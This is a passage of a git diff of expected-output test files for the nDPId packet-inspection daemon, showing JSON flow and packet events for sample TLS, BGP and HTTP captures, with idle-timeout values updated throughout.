+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":41,"packets-processed":41,"total-skipped-flows":0,"total-l4-data-len":17203,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109360696} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 41/41 diff --git a/test/results/BGP_Cisco_hdlc_slarp.pcap.out b/test/results/BGP_Cisco_hdlc_slarp.pcap.out index 214a2abc4..d82f132e1 100644 --- a/test/results/BGP_Cisco_hdlc_slarp.pcap.out +++ b/test/results/BGP_Cisco_hdlc_slarp.pcap.out @@ -1,11 +1,11 @@ 00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1445156939131} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1445156939131,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1445156939131,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1445156939131,"flow_last_seen":1445156939131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1445156939131,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-data-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1445156989230} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 diff --git a/test/results/BGP_redist.pcap.out b/test/results/BGP_redist.pcap.out index d149ebd67..686966d2b 100644 --- a/test/results/BGP_redist.pcap.out +++ b/test/results/BGP_redist.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1256636836167} 00187{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":104,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","protocol":34887,"global_ts_msec":1256636836167} 00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} -00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} +00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1256636836167} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/1 diff --git a/test/results/EAQ.pcap.out b/test/results/EAQ.pcap.out index e69a44cc7..107de09ca 100644 --- a/test/results/EAQ.pcap.out +++ b/test/results/EAQ.pcap.out @@ -1,15 +1,15 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"EAQ.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432820948562} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948562,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948562,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"} -00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 